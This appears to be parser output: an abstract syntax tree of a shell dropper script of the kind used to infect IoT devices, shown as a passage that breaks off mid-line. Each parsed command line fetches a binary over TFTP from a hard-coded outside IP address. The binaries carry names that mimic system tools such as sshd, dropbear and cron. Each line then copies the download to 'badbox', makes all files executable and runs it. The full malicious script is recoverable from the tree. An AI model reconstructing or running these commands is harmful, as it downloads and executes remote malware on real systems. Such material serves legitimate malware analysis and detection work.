CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 172), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 135), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 123), word='94.177.243.240'),
    WordNode(lineno=4, pos=(124, 126), word='-c'),
    WordNode(lineno=4, pos=(127, 130), word='get'),
    WordNode(lineno=4, pos=(131, 135), word='ntpd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(135, 136)),
  CommandNode(lineno=4, pos=(136, 152), parts=[
    WordNode(lineno=4, pos=(136, 139), word='cat'),
    WordNode(lineno=4, pos=(140, 144), word='ntpd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(146, 152), word='badbox'), pos=(145, 152), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(152, 153)),
  CommandNode(lineno=4, pos=(153, 163), parts=[
    WordNode(lineno=4, pos=(153, 158), word='chmod'),
    WordNode(lineno=4, pos=(159, 161), word='+x'),
    WordNode(lineno=4, pos=(162, 163), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(163, 164)),
  CommandNode(lineno=4, pos=(164, 172), parts=[
    WordNode(lineno=4, pos=(164, 172), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(173, 296), parts=[
  CommandNode(lineno=5, pos=(173, 180), parts=[
    WordNode(lineno=5, pos=(173, 175), word='cd'),
    WordNode(lineno=5, pos=(176, 180), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(181, 183)),
  CommandNode(lineno=5, pos=(184, 195), parts=[
    WordNode(lineno=5, pos=(184, 186), word='cd'),
    WordNode(lineno=5, pos=(187, 195), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(196, 198)),
  CommandNode(lineno=5, pos=(199, 206), parts=[
    WordNode(lineno=5, pos=(199, 201), word='cd'),
    WordNode(lineno=5, pos=(202, 206), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(207, 209)),
  CommandNode(lineno=5, pos=(210, 218), parts=[
    WordNode(lineno=5, pos=(210, 212), word='cd'),
    WordNode(lineno=5, pos=(213, 218), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(219, 221)),
  CommandNode(lineno=5, pos=(222, 226), parts=[
    WordNode(lineno=5, pos=(222, 224), word='cd'),
    WordNode(lineno=5, pos=(225, 226), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(226, 227)),
  CommandNode(lineno=5, pos=(228, 259), parts=[
    WordNode(lineno=5, pos=(228, 232), word='tftp'),
    WordNode(lineno=5, pos=(233, 247), word='94.177.243.240'),
    WordNode(lineno=5, pos=(248, 250), word='-c'),
    WordNode(lineno=5, pos=(251, 254), word='get'),
    WordNode(lineno=5, pos=(255, 259), word='sshd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(259, 260)),
  CommandNode(lineno=5, pos=(260, 276), parts=[
    WordNode(lineno=5, pos=(260, 263), word='cat'),
    WordNode(lineno=5, pos=(264, 268), word='sshd'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(270, 276), word='badbox'), pos=(269, 276), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(276, 277)),
  CommandNode(lineno=5, pos=(277, 287), parts=[
    WordNode(lineno=5, pos=(277, 282), word='chmod'),
    WordNode(lineno=5, pos=(283, 285), word='+x'),
    WordNode(lineno=5, pos=(286, 287), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(287, 288)),
  CommandNode(lineno=5, pos=(288, 296), parts=[
    WordNode(lineno=5, pos=(288, 296), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(297, 426), parts=[
  CommandNode(lineno=6, pos=(297, 304), parts=[
    WordNode(lineno=6, pos=(297, 299), word='cd'),
    WordNode(lineno=6, pos=(300, 304), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(305, 307)),
  CommandNode(lineno=6, pos=(308, 319), parts=[
    WordNode(lineno=6, pos=(308, 310), word='cd'),
    WordNode(lineno=6, pos=(311, 319), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(320, 322)),
  CommandNode(lineno=6, pos=(323, 330), parts=[
    WordNode(lineno=6, pos=(323, 325), word='cd'),
    WordNode(lineno=6, pos=(326, 330), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(331, 333)),
  CommandNode(lineno=6, pos=(334, 342), parts=[
    WordNode(lineno=6, pos=(334, 336), word='cd'),
    WordNode(lineno=6, pos=(337, 342), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(343, 345)),
  CommandNode(lineno=6, pos=(346, 350), parts=[
    WordNode(lineno=6, pos=(346, 348), word='cd'),
    WordNode(lineno=6, pos=(349, 350), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(350, 351)),
  CommandNode(lineno=6, pos=(352, 386), parts=[
    WordNode(lineno=6, pos=(352, 356), word='tftp'),
    WordNode(lineno=6, pos=(357, 371), word='94.177.243.240'),
    WordNode(lineno=6, pos=(372, 374), word='-c'),
    WordNode(lineno=6, pos=(375, 378), word='get'),
    WordNode(lineno=6, pos=(379, 386), word='openssh'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(386, 387)),
  CommandNode(lineno=6, pos=(387, 406), parts=[
    WordNode(lineno=6, pos=(387, 390), word='cat'),
    WordNode(lineno=6, pos=(391, 398), word='openssh'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(400, 406), word='badbox'), pos=(399, 406), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(406, 407)),
  CommandNode(lineno=6, pos=(407, 417), parts=[
    WordNode(lineno=6, pos=(407, 412), word='chmod'),
    WordNode(lineno=6, pos=(413, 415), word='+x'),
    WordNode(lineno=6, pos=(416, 417), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(417, 418)),
  CommandNode(lineno=6, pos=(418, 426), parts=[
    WordNode(lineno=6, pos=(418, 426), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(427, 550), parts=[
  CommandNode(lineno=7, pos=(427, 434), parts=[
    WordNode(lineno=7, pos=(427, 429), word='cd'),
    WordNode(lineno=7, pos=(430, 434), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(435, 437)),
  CommandNode(lineno=7, pos=(438, 449), parts=[
    WordNode(lineno=7, pos=(438, 440), word='cd'),
    WordNode(lineno=7, pos=(441, 449), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(450, 452)),
  CommandNode(lineno=7, pos=(453, 460), parts=[
    WordNode(lineno=7, pos=(453, 455), word='cd'),
    WordNode(lineno=7, pos=(456, 460), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(461, 463)),
  CommandNode(lineno=7, pos=(464, 472), parts=[
    WordNode(lineno=7, pos=(464, 466), word='cd'),
    WordNode(lineno=7, pos=(467, 472), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(473, 475)),
  CommandNode(lineno=7, pos=(476, 480), parts=[
    WordNode(lineno=7, pos=(476, 478), word='cd'),
    WordNode(lineno=7, pos=(479, 480), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(480, 481)),
  CommandNode(lineno=7, pos=(482, 513), parts=[
    WordNode(lineno=7, pos=(482, 486), word='tftp'),
    WordNode(lineno=7, pos=(487, 501), word='94.177.243.240'),
    WordNode(lineno=7, pos=(502, 504), word='-c'),
    WordNode(lineno=7, pos=(505, 508), word='get'),
    WordNode(lineno=7, pos=(509, 513), word='bash'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(513, 514)),
  CommandNode(lineno=7, pos=(514, 530), parts=[
    WordNode(lineno=7, pos=(514, 517), word='cat'),
    WordNode(lineno=7, pos=(518, 522), word='bash'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(524, 530), word='badbox'), pos=(523, 530), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(530, 531)),
  CommandNode(lineno=7, pos=(531, 541), parts=[
    WordNode(lineno=7, pos=(531, 536), word='chmod'),
    WordNode(lineno=7, pos=(537, 539), word='+x'),
    WordNode(lineno=7, pos=(540, 541), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(541, 542)),
  CommandNode(lineno=7, pos=(542, 550), parts=[
    WordNode(lineno=7, pos=(542, 550), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(551, 674), parts=[
  CommandNode(lineno=8, pos=(551, 558), parts=[
    WordNode(lineno=8, pos=(551, 553), word='cd'),
    WordNode(lineno=8, pos=(554, 558), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(559, 561)),
  CommandNode(lineno=8, pos=(562, 573), parts=[
    WordNode(lineno=8, pos=(562, 564), word='cd'),
    WordNode(lineno=8, pos=(565, 573), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(574, 576)),
  CommandNode(lineno=8, pos=(577, 584), parts=[
    WordNode(lineno=8, pos=(577, 579), word='cd'),
    WordNode(lineno=8, pos=(580, 584), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(585, 587)),
  CommandNode(lineno=8, pos=(588, 596), parts=[
    WordNode(lineno=8, pos=(588, 590), word='cd'),
    WordNode(lineno=8, pos=(591, 596), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(597, 599)),
  CommandNode(lineno=8, pos=(600, 604), parts=[
    WordNode(lineno=8, pos=(600, 602), word='cd'),
    WordNode(lineno=8, pos=(603, 604), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(604, 605)),
  CommandNode(lineno=8, pos=(606, 637), parts=[
    WordNode(lineno=8, pos=(606, 610), word='tftp'),
    WordNode(lineno=8, pos=(611, 625), word='94.177.243.240'),
    WordNode(lineno=8, pos=(626, 628), word='-c'),
    WordNode(lineno=8, pos=(629, 632), word='get'),
    WordNode(lineno=8, pos=(633, 637), word='tftp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(637, 638)),
  CommandNode(lineno=8, pos=(638, 654), parts=[
    WordNode(lineno=8, pos=(638, 641), word='cat'),
    WordNode(lineno=8, pos=(642, 646), word='tftp'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(648, 654), word='badbox'), pos=(647, 654), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(654, 655)),
  CommandNode(lineno=8, pos=(655, 665), parts=[
    WordNode(lineno=8, pos=(655, 660), word='chmod'),
    WordNode(lineno=8, pos=(661, 663), word='+x'),
    WordNode(lineno=8, pos=(664, 665), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(665, 666)),
  CommandNode(lineno=8, pos=(666, 674), parts=[
    WordNode(lineno=8, pos=(666, 674), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(675, 802), parts=[
  CommandNode(lineno=9, pos=(675, 682), parts=[
    WordNode(lineno=9, pos=(675, 677), word='cd'),
    WordNode(lineno=9, pos=(678, 682), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(683, 685)),
  CommandNode(lineno=9, pos=(686, 697), parts=[
    WordNode(lineno=9, pos=(686, 688), word='cd'),
    WordNode(lineno=9, pos=(689, 697), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(698, 700)),
  CommandNode(lineno=9, pos=(701, 708), parts=[
    WordNode(lineno=9, pos=(701, 703), word='cd'),
    WordNode(lineno=9, pos=(704, 708), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(709, 711)),
  CommandNode(lineno=9, pos=(712, 720), parts=[
    WordNode(lineno=9, pos=(712, 714), word='cd'),
    WordNode(lineno=9, pos=(715, 720), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(721, 723)),
  CommandNode(lineno=9, pos=(724, 728), parts=[
    WordNode(lineno=9, pos=(724, 726), word='cd'),
    WordNode(lineno=9, pos=(727, 728), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(728, 729)),
  CommandNode(lineno=9, pos=(730, 763), parts=[
    WordNode(lineno=9, pos=(730, 734), word='tftp'),
    WordNode(lineno=9, pos=(735, 749), word='94.177.243.240'),
    WordNode(lineno=9, pos=(750, 752), word='-c'),
    WordNode(lineno=9, pos=(753, 756), word='get'),
    WordNode(lineno=9, pos=(757, 763), word='pstree'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(763, 764)),
  CommandNode(lineno=9, pos=(764, 782), parts=[
    WordNode(lineno=9, pos=(764, 767), word='cat'),
    WordNode(lineno=9, pos=(768, 774), word='pstree'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(776, 782), word='badbox'), pos=(775, 782), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(782, 783)),
  CommandNode(lineno=9, pos=(783, 793), parts=[
    WordNode(lineno=9, pos=(783, 788), word='chmod'),
    WordNode(lineno=9, pos=(789, 791), word='+x'),
    WordNode(lineno=9, pos=(792, 793), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(793, 794)),
  CommandNode(lineno=9, pos=(794, 802), parts=[
    WordNode(lineno=9, pos=(794, 802), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(803, 934), parts=[
  CommandNode(lineno=10, pos=(803, 810), parts=[
    WordNode(lineno=10, pos=(803, 805), word='cd'),
    WordNode(lineno=10, pos=(806, 810), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(811, 813)),
  CommandNode(lineno=10, pos=(814, 825), parts=[
    WordNode(lineno=10, pos=(814, 816), word='cd'),
    WordNode(lineno=10, pos=(817, 825), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(826, 828)),
  CommandNode(lineno=10, pos=(829, 836), parts=[
    WordNode(lineno=10, pos=(829, 831), word='cd'),
    WordNode(lineno=10, pos=(832, 836), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(837, 839)),
  CommandNode(lineno=10, pos=(840, 848), parts=[
    WordNode(lineno=10, pos=(840, 842), word='cd'),
    WordNode(lineno=10, pos=(843, 848), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(849, 851)),
  CommandNode(lineno=10, pos=(852, 856), parts=[
    WordNode(lineno=10, pos=(852, 854), word='cd'),
    WordNode(lineno=10, pos=(855, 856), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(856, 857)),
  CommandNode(lineno=10, pos=(858, 893), parts=[
    WordNode(lineno=10, pos=(858, 862), word='tftp'),
    WordNode(lineno=10, pos=(863, 877), word='94.177.243.240'),
    WordNode(lineno=10, pos=(878, 880), word='-c'),
    WordNode(lineno=10, pos=(881, 884), word='get'),
    WordNode(lineno=10, pos=(885, 893), word='dropbear'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(893, 894)),
  CommandNode(lineno=10, pos=(894, 914), parts=[
    WordNode(lineno=10, pos=(894, 897), word='cat'),
    WordNode(lineno=10, pos=(898, 906), word='dropbear'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(908, 914), word='badbox'), pos=(907, 914), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(914, 915)),
  CommandNode(lineno=10, pos=(915, 925), parts=[
    WordNode(lineno=10, pos=(915, 920), word='chmod'),
    WordNode(lineno=10, pos=(921, 923), word='+x'),
    WordNode(lineno=10, pos=(924, 925), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(925, 926)),
  CommandNode(lineno=10, pos=(926, 934), parts=[
    WordNode(lineno=10, pos=(926, 934), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(935, 1058), parts=[
  CommandNode(lineno=11, pos=(935, 942), parts=[
    WordNode(lineno=11, pos=(935, 937), word='cd'),
    WordNode(lineno=11, pos=(938, 942), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(943, 945)),
  CommandNode(lineno=11, pos=(946, 957), parts=[
    WordNode(lineno=11, pos=(946, 948), word='cd'),
    WordNode(lineno=11, pos=(949, 957), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(958, 960)),
  CommandNode(lineno=11, pos=(961, 968), parts=[
    WordNode(lineno=11, pos=(961, 963), word='cd'),
    WordNode(lineno=11, pos=(964, 968), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(969, 971)),
  CommandNode(lineno=11, pos=(972, 980), parts=[
    WordNode(lineno=11, pos=(972, 974), word='cd'),
    WordNode(lineno=11, pos=(975, 980), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(981, 983)),
  CommandNode(lineno=11, pos=(984, 988), parts=[
    WordNode(lineno=11, pos=(984, 986), word='cd'),
    WordNode(lineno=11, pos=(987, 988), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(988, 989)),
  CommandNode(lineno=11, pos=(990, 1021), parts=[
    WordNode(lineno=11, pos=(990, 994), word='tftp'),
    WordNode(lineno=11, pos=(995, 1009), word='94.177.243.240'),
    WordNode(lineno=11, pos=(1010, 1012), word='-c'),
    WordNode(lineno=11, pos=(1013, 1016), word='get'),
    WordNode(lineno=11, pos=(1017, 1021), word='wget'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1021, 1022)),
  CommandNode(lineno=11, pos=(1022, 1038), parts=[
    WordNode(lineno=11, pos=(1022, 1025), word='cat'),
    WordNode(lineno=11, pos=(1026, 1030), word='wget'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1032, 1038), word='badbox'), pos=(1031, 1038), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1038, 1039)),
  CommandNode(lineno=11, pos=(1039, 1049), parts=[
    WordNode(lineno=11, pos=(1039, 1044), word='chmod'),
    WordNode(lineno=11, pos=(1045, 1047), word='+x'),
    WordNode(lineno=11, pos=(1048, 1049), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1049, 1050)),
  CommandNode(lineno=11, pos=(1050, 1058), parts=[
    WordNode(lineno=11, pos=(1050, 1058), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1059, 1182), parts=[
  CommandNode(lineno=12, pos=(1059, 1066), parts=[
    WordNode(lineno=12, pos=(1059, 1061), word='cd'),
    WordNode(lineno=12, pos=(1062, 1066), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1067, 1069)),
  CommandNode(lineno=12, pos=(1070, 1081), parts=[
    WordNode(lineno=12, pos=(1070, 1072), word='cd'),
    WordNode(lineno=12, pos=(1073, 1081), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1082, 1084)),
  CommandNode(lineno=12, pos=(1085, 1092), parts=[
    WordNode(lineno=12, pos=(1085, 1087), word='cd'),
    WordNode(lineno=12, pos=(1088, 1092), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1093, 1095)),
  CommandNode(lineno=12, pos=(1096, 1104), parts=[
    WordNode(lineno=12, pos=(1096, 1098), word='cd'),
    WordNode(lineno=12, pos=(1099, 1104), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1105, 1107)),
  CommandNode(lineno=12, pos=(1108, 1112), parts=[
    WordNode(lineno=12, pos=(1108, 1110), word='cd'),
    WordNode(lineno=12, pos=(1111, 1112), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1112, 1113)),
  CommandNode(lineno=12, pos=(1114, 1145), parts=[
    WordNode(lineno=12, pos=(1114, 1118), word='tftp'),
    WordNode(lineno=12, pos=(1119, 1133), word='94.177.243.240'),
    WordNode(lineno=12, pos=(1134, 1136), word='-c'),
    WordNode(lineno=12, pos=(1137, 1140), word='get'),
    WordNode(lineno=12, pos=(1141, 1145), word='cron'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1145, 1146)),
  CommandNode(lineno=12, pos=(1146, 1162), parts=[
    WordNode(lineno=12, pos=(1146, 1149), word='cat'),
    WordNode(lineno=12, pos=(1150, 1154), word='cron'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1156, 1162), word='badbox'), pos=(1155, 1162), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1162, 1163)),
  CommandNode(lineno=12, pos=(1163, 1173), parts=[
    WordNode(lineno=12, pos=(1163, 1168), word='chmod'),
    WordNode(lineno=12, pos=(1169, 1171), word='+x'),
    WordNode(lineno=12, pos=(1172, 1173), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1173, 1174)),
  CommandNode(lineno=12, pos=(1174, 1182), parts=[
    WordNode(lineno=12, pos=(1174, 1182), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1183, 1304), parts=[
  CommandNode(lineno=13, pos=(1183, 1190), parts=[
    WordNode(lineno=13, pos=(1183, 1185), word='cd'),
    WordNode(lineno=13, pos=(1186, 1190), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1191, 1193)),
  CommandNode(lineno=13, pos=(1194, 1205), parts=[
    WordNode(lineno=13, pos=(1194, 1196), word='cd'),
    WordNode(lineno=13, pos=(1197, 1205), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1206, 1208)),
  CommandNode(lineno=13, pos=(1209, 1216), parts=[
    WordNode(lineno=13, pos=(1209, 1211), word='cd'),
    WordNode(lineno=13, pos=(1212, 1216), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1217, 1219)),
  CommandNode(lineno=13, pos=(1220, 1228), parts=[
    WordNode(lineno=13, pos=(1220, 1222), word='cd'),
    WordNode(lineno=13, pos=(1223, 1228), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1229, 1231)),
  CommandNode(lineno=13, pos=(1232, 1236), parts=[
    WordNode(lineno=13, pos=(1232, 1234), word='cd'),
    WordNode(lineno=13, pos=(1235, 1236), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1236, 1237)),
  CommandNode(lineno=13, pos=(1238, 1268), parts=[
    WordNode(lineno=13, pos=(1238, 1242), word='tftp'),
    WordNode(lineno=13, pos=(1243, 1257), word='94.177.243.240'),
    WordNode(lineno=13, pos=(1258, 1260), word='-c'),
    WordNode(lineno=13, pos=(1261, 1264), word='get'),
    WordNode(lineno=13, pos=(1265, 1268), word='ftp'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1268, 1269)),
  CommandNode(lineno=13, pos=(1269, 1284), parts=[
    WordNode(lineno=13, pos=(1269, 1272), word='cat'),
    WordNode(lineno=13, pos=(1273, 1276), word='ftp'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1278, 1284), word='badbox'), pos=(1277, 1284), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1284, 1285)),
  CommandNode(lineno=13, pos=(1285, 1295), parts=[
    WordNode(lineno=13, pos=(1285, 1290), word='chmod'),
    WordNode(lineno=13, pos=(1291, 1293), word='+x'),
    WordNode(lineno=13, pos=(1294, 1295), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1295, 1296)),
  CommandNode(lineno=13, pos=(1296, 1304), parts=[
    WordNode(lineno=13, pos=(1296, 1304), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1305, 1428), parts=[
  CommandNode(lineno=14, pos=(1305, 1312), parts=[
    WordNode(lineno=14, pos=(1305, 1307), word='cd'),
    WordNode(lineno=14, pos=(1308, 1312), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1313, 1315)),
  CommandNode(lineno=14, pos=(1316, 1327), parts=[
    WordNode(lineno=14, pos=(1316, 1318), word='cd'),
    WordNode(lineno=14, pos=(1319, 1327), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1328, 1330)),
  CommandNode(lineno=14, pos=(1331, 1338), parts=[
    WordNode(lineno=14, pos=(1331, 1333), word='cd'),
    WordNode(lineno=14, pos=(1334, 1338), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1339, 1341)),
  CommandNode(lineno=14, pos=(1342, 1350), parts=[
    WordNode(lineno=14, pos=(1342, 1344), word='cd'),
    WordNode(lineno=14, pos=(1345, 1350), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1351, 1353)),
  CommandNode(lineno=14, pos=(1354, 1358), parts=[
    WordNode(lineno=14, pos=(1354, 1356), word='cd'),
    WordNode(lineno=14, pos=(1357, 1358), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1358, 1359)),
  CommandNode(lineno=14, pos=(1360, 1391), parts=[
    WordNode(lineno=14, pos=(1360, 1364), word='tftp'),
    WordNode(lineno=14, pos=(1365, 1379), word='94.177.243.240'),
    WordNode(lineno=14, pos=(1380, 1382), word='-c'),
    WordNode(lineno=14, pos=(1383, 1386), word='get'),
    WordNode(lineno=14, pos=(1387, 1391), word='pftp'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1391, 1392)),
  CommandNode(lineno=14, pos=(1392, 1408), parts=[
    WordNode(lineno=14, pos=(1392, 1395), word='cat'),
    WordNode(lineno=14, pos=(1396, 1400), word='pftp'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1402, 1408), word='badbox'), pos=(1401, 1408), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1408, 1409)),
  CommandNode(lineno=14, pos=(1409, 1419), parts=[
    WordNode(lineno=14, pos=(1409, 1414), word='chmod'),
    WordNode(lineno=14, pos=(1415, 1417), word='+x'),
    WordNode(lineno=14, pos=(1418, 1419), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1419, 1420)),
  CommandNode(lineno=14, pos=(1420, 1428), parts=[
    WordNode(lineno=14, pos=(1420, 1428), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1429, 1548), parts=[
  CommandNode(lineno=15, pos=(1429, 1436), parts=[
    WordNode(lineno=15, pos=(1429, 1431), word='cd'),
    WordNode(lineno=15, pos=(1432, 1436), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1437, 1439)),
  CommandNode(lineno=15, pos=(1440, 1451), parts=[
    WordNode(lineno=15, pos=(1440, 1442), word='cd'),
    WordNode(lineno=15, pos=(1443, 1451), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1452, 1454)),
  CommandNode(lineno=15, pos=(1455, 1462), parts=[
    WordNode(lineno=15, pos=(1455, 1457), word='cd'),
    WordNode(lineno=15, pos=(1458, 1462), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1463, 1465)),
  CommandNode(lineno=15, pos=(1466, 1474), parts=[
    WordNode(lineno=15, pos=(1466, 1468), word='cd'),
    WordNode(lineno=15, pos=(1469, 1474), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1475, 1477)),
  CommandNode(lineno=15, pos=(1478, 1482), parts=[
    WordNode(lineno=15, pos=(1478, 1480), word='cd'),
    WordNode(lineno=15, pos=(1481, 1482), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1482, 1483)),
  CommandNode(lineno=15, pos=(1484, 1513), parts=[
    WordNode(lineno=15, pos=(1484, 1488), word='tftp'),
    WordNode(lineno=15, pos=(1489, 1503), word='94.177.243.240'),
    WordNode(lineno=15, pos=(1504, 1506), word='-c'),
    WordNode(lineno=15, pos=(1507, 1510), word='get'),
    WordNode(lineno=15, pos=(1511, 1513), word='sh'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1513, 1514)),
  CommandNode(lineno=15, pos=(1514, 1528), parts=[
    WordNode(lineno=15, pos=(1514, 1517), word='cat'),
    WordNode(lineno=15, pos=(1518, 1520), word='sh'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1522, 1528), word='badbox'), pos=(1521, 1528), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1528, 1529)),
  CommandNode(lineno=15, pos=(1529, 1539), parts=[
    WordNode(lineno=15, pos=(1529, 1534), word='chmod'),
    WordNode(lineno=15, pos=(1535, 1537), word='+x'),
    WordNode(lineno=15, pos=(1538, 1539), word='*'),
